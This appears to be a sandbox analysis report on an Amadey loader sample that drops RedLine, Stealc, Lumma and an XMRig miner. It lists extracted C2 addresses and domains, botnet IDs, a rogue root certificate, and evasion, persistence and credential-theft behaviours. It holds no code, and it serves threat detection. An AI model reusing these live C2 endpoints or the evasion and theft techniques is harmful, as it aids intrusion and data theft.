amadey | e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
25/05/2024, 19:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
Size

1.8MB
MD5

c0c53d6ec99dbb994242492ee9458d17
SHA1

272e819e44feb92ae350b6a228cccde70387b496
SHA256

e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9
SHA512

303b751cb66fa6d1ed8e970aeda32dea71a1c13e161ba2cfc00883eed1fdfd91f89575d6a64c3f104b3bae4efdfec274757e1def5ee0a552eb511a730f1ad140
SSDEEP

49152:0XvOPqJFhNjAwlFcdUvT5Zc01YF7/Rz9U81/384wGrvSD:dPqLhNrFnv3r1Y1RDB384DzSD

Malware Config

Extracted

Family

amadey

Version

4.21

Botnet

49e482

http://147.45.47.70

Attributes

install_dir
1b29d73536
install_file
axplont.exe
strings_key
4d31dd1a190d9879c21fac6d87dc0043
url_paths
/tr8nomy/index.php

rc4.plain

Extracted

Family

redline

Botnet

185.215.113.67:40960

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

185.172.128.33:8970

Extracted

Family

stealc

Botnet

zzvv

http://23.88.106.134

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

lumma

https://roomabolishsnifftwk.shop/api

https://museumtespaceorsp.shop/api

https://civilianurinedtsraov.shop/api

https://buttockdecarderwiso.shop/api

https://averageaattractiionsl.shop/api

https://femininiespywageg.shop/api

https://employhabragaomlsp.shop/api

https://stalfbaclcalorieeis.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023436-70.dat	family_redline
behavioral1/memory/4048-117-0x00000000008B0000-0x0000000000902000-memory.dmp	family_redline
behavioral1/files/0x000700000002343a-137.dat	family_redline
behavioral1/memory/2400-143-0x0000000000280000-0x00000000002D2000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral1/files/0x000d000000023458-490.dat	family_xmrig
behavioral1/files/0x000d000000023458-490.dat	xmrig
behavioral1/memory/1028-558-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1028-561-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1028-564-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1028-565-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1028-563-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1028-562-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1028-559-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1028-566-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5176	powershell.exe
5140	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4832	netsh.exe
5228	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Newoff.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	axplont.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	RegAsm.exe

Executes dropped EXE 37 IoCs

pid	Process
3224	axplont.exe
4688	buildjudit.exe
2256	33333.exe
4048	fileosn.exe
2400	svhoost.exe
2208	One.exe
2440	lumma1234.exe
5088	Newoff.exe
4168	gold.exe
2160	toolspub1.exe
4088	swizzzz.exe
4016	axplont.exe
1376	FirstZ.exe
2212	install.exe
3492	Newoff.exe
5184	GameService.exe
5228	GameService.exe
5248	GameService.exe
5276	GameService.exe
5296	GameService.exe
5408	GameSyncLink.exe
5496	698247.exe
6084	GameService.exe
5224	GameService.exe
5252	GameService.exe
1228	GameService.exe
2772	GameService.exe
3912	PiercingNetLink.exe
5808	GameService.exe
5872	GameService.exe
5292	GameService.exe
5832	GameService.exe
5980	GameSyncLinks.exe
5012	506308.exe
5872	reakuqnanrkn.exe
656	axplont.exe
4812	Newoff.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	axplont.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	axplont.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	axplont.exe

Loads dropped DLL 3 IoCs

pid	Process
5496	698247.exe
4932	RegAsm.exe
4932	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1028-555-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-558-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-561-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-564-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-565-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-563-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-562-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-559-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-557-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-554-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-556-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-553-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-566-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
123	pastebin.com
39	raw.githubusercontent.com
40	raw.githubusercontent.com
122	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	ip-api.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
60	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
3224	axplont.exe
4016	axplont.exe
656	axplont.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2256 set thread context of 404	2256	33333.exe	116
PID 2440 set thread context of 4016	2440	lumma1234.exe	164
PID 4168 set thread context of 1376	4168	gold.exe	165
PID 4088 set thread context of 4932	4088	swizzzz.exe	158
PID 5872 set thread context of 5568	5872	reakuqnanrkn.exe	288
PID 5872 set thread context of 1028	5872	reakuqnanrkn.exe	293

Drops file in Program Files directory 15 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\status.txt	GameSyncLinks.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplont.job	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe

Launches sc.exe 20 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5168	sc.exe
5512	sc.exe
4512	sc.exe
3936	sc.exe
6072	sc.exe
5768	sc.exe
1208	sc.exe
3288	sc.exe
2044	sc.exe
1920	sc.exe
5596	sc.exe
5656	sc.exe
5788	sc.exe
2544	sc.exe
5776	sc.exe
5212	sc.exe
5132	sc.exe
5176	sc.exe
5688	sc.exe
5844	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4232	2256	WerFault.exe	111
3528	2160	WerFault.exe	156

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
5580	WMIC.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
836	schtasks.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
8	tasklist.exe
3244	tasklist.exe
5832	tasklist.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5944	ipconfig.exe
6128	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4812	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3164	taskkill.exe

Modifies data under HKEY_USERS 50 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	fileosn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	fileosn.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
60	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
60	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
3224	axplont.exe
3224	axplont.exe
1540	powershell.exe
1540	powershell.exe
1540	powershell.exe
4932	RegAsm.exe
4932	RegAsm.exe
2208	One.exe
2208	One.exe
4016	axplont.exe
4016	axplont.exe
4932	RegAsm.exe
4932	RegAsm.exe
2400	svhoost.exe
2400	svhoost.exe
4048	fileosn.exe
4048	fileosn.exe
4048	fileosn.exe
4048	fileosn.exe
4048	fileosn.exe
4048	fileosn.exe
2400	svhoost.exe
2400	svhoost.exe
2400	svhoost.exe
2400	svhoost.exe
1376	FirstZ.exe
5176	powershell.exe
5176	powershell.exe
5176	powershell.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
5872	reakuqnanrkn.exe
5140	powershell.exe
5140	powershell.exe
5140	powershell.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
1028	explorer.exe
1028	explorer.exe
1028	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2352	WMIC.exe
Token: SeSecurityPrivilege	2352	WMIC.exe
Token: SeTakeOwnershipPrivilege	2352	WMIC.exe
Token: SeLoadDriverPrivilege	2352	WMIC.exe
Token: SeSystemProfilePrivilege	2352	WMIC.exe
Token: SeSystemtimePrivilege	2352	WMIC.exe
Token: SeProfSingleProcessPrivilege	2352	WMIC.exe
Token: SeIncBasePriorityPrivilege	2352	WMIC.exe
Token: SeCreatePagefilePrivilege	2352	WMIC.exe
Token: SeBackupPrivilege	2352	WMIC.exe
Token: SeRestorePrivilege	2352	WMIC.exe
Token: SeShutdownPrivilege	2352	WMIC.exe
Token: SeDebugPrivilege	2352	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2352	WMIC.exe
Token: SeRemoteShutdownPrivilege	2352	WMIC.exe
Token: SeUndockPrivilege	2352	WMIC.exe
Token: SeManageVolumePrivilege	2352	WMIC.exe
Token: 33	2352	WMIC.exe
Token: 34	2352	WMIC.exe
Token: 35	2352	WMIC.exe
Token: 36	2352	WMIC.exe
Token: SeDebugPrivilege	8	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2352	WMIC.exe
Token: SeSecurityPrivilege	2352	WMIC.exe
Token: SeTakeOwnershipPrivilege	2352	WMIC.exe
Token: SeLoadDriverPrivilege	2352	WMIC.exe
Token: SeSystemProfilePrivilege	2352	WMIC.exe
Token: SeSystemtimePrivilege	2352	WMIC.exe
Token: SeProfSingleProcessPrivilege	2352	WMIC.exe
Token: SeIncBasePriorityPrivilege	2352	WMIC.exe
Token: SeCreatePagefilePrivilege	2352	WMIC.exe
Token: SeBackupPrivilege	2352	WMIC.exe
Token: SeRestorePrivilege	2352	WMIC.exe
Token: SeShutdownPrivilege	2352	WMIC.exe
Token: SeDebugPrivilege	2352	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2352	WMIC.exe
Token: SeRemoteShutdownPrivilege	2352	WMIC.exe
Token: SeUndockPrivilege	2352	WMIC.exe
Token: SeManageVolumePrivilege	2352	WMIC.exe
Token: 33	2352	WMIC.exe
Token: 34	2352	WMIC.exe
Token: 35	2352	WMIC.exe
Token: 36	2352	WMIC.exe
Token: SeDebugPrivilege	3164	taskkill.exe
Token: SeDebugPrivilege	2208	One.exe
Token: SeBackupPrivilege	2208	One.exe
Token: SeDebugPrivilege	3244	tasklist.exe
Token: SeSecurityPrivilege	2208	One.exe
Token: SeSecurityPrivilege	2208	One.exe
Token: SeSecurityPrivilege	2208	One.exe
Token: SeSecurityPrivilege	2208	One.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeIncreaseQuotaPrivilege	5580	WMIC.exe
Token: SeSecurityPrivilege	5580	WMIC.exe
Token: SeTakeOwnershipPrivilege	5580	WMIC.exe
Token: SeLoadDriverPrivilege	5580	WMIC.exe
Token: SeSystemProfilePrivilege	5580	WMIC.exe
Token: SeSystemtimePrivilege	5580	WMIC.exe
Token: SeProfSingleProcessPrivilege	5580	WMIC.exe
Token: SeIncBasePriorityPrivilege	5580	WMIC.exe
Token: SeCreatePagefilePrivilege	5580	WMIC.exe
Token: SeBackupPrivilege	5580	WMIC.exe
Token: SeRestorePrivilege	5580	WMIC.exe
Token: SeShutdownPrivilege	5580	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
5012	506308.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 60 wrote to memory of 3224	60	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe	86
